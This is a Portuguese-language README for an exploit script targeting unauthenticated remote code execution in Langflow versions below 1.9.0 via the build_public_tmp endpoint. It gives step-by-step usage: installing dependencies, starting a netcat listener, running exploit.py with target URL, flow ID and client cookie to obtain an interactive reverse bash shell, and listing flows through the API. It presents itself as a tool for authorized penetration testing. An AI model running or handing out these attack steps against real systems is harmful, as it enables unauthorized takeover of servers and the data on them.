
Exploração para execução remota de código não autenticada no Langflow <1.9.0 via endpoint build_public_tmp, entregando um shell reverso para testes de penetração autorizados.
Execução Remota de Código para Langflow através do endpoint build_public_tmp.
Exploração via endpoint público de construção de fluxo que executa uma shell reversa no alvo.
httpxInstalar:
pip install httpx
python exploit.py -u <BASE_URL> -l <LHOST> -p <LPORT> --flow-id <FLOW_ID> --client-id <CLIENT_ID>
-u, --url : URL base da instância Langflow (ex.: https://flow.example.com/)-l, --lhost : Seu endereço IP para receber a shell reversa-p, --lport : Porta de escuta para a shell reversa-f --flow-id : ID do fluxo alvo (obrigatório – obter de /api/v1/flows/ ou da interface)-c --client-id : Valor do cookie client_id para identificação de sessãoInicie um listener:
nc -nlvp 9001
Execute o exploit:
python exploit.py -u https://flow.target.local/ -l 127.0.0.1 -p 9001 --flow-id 7d84d636-af65-42e4-ac38-26e867052c25 --client-id 8a6bf601-0263-480b-aa81-9a6389ca9e5d
Se bem-sucedido, você receberá uma shell bash interativa.
flow-id válido é necessário. Liste todos os fluxos via GET /api/v1/flows ou copie da URL do navegador.MIT – para pesquisa educacional e ética em segurança.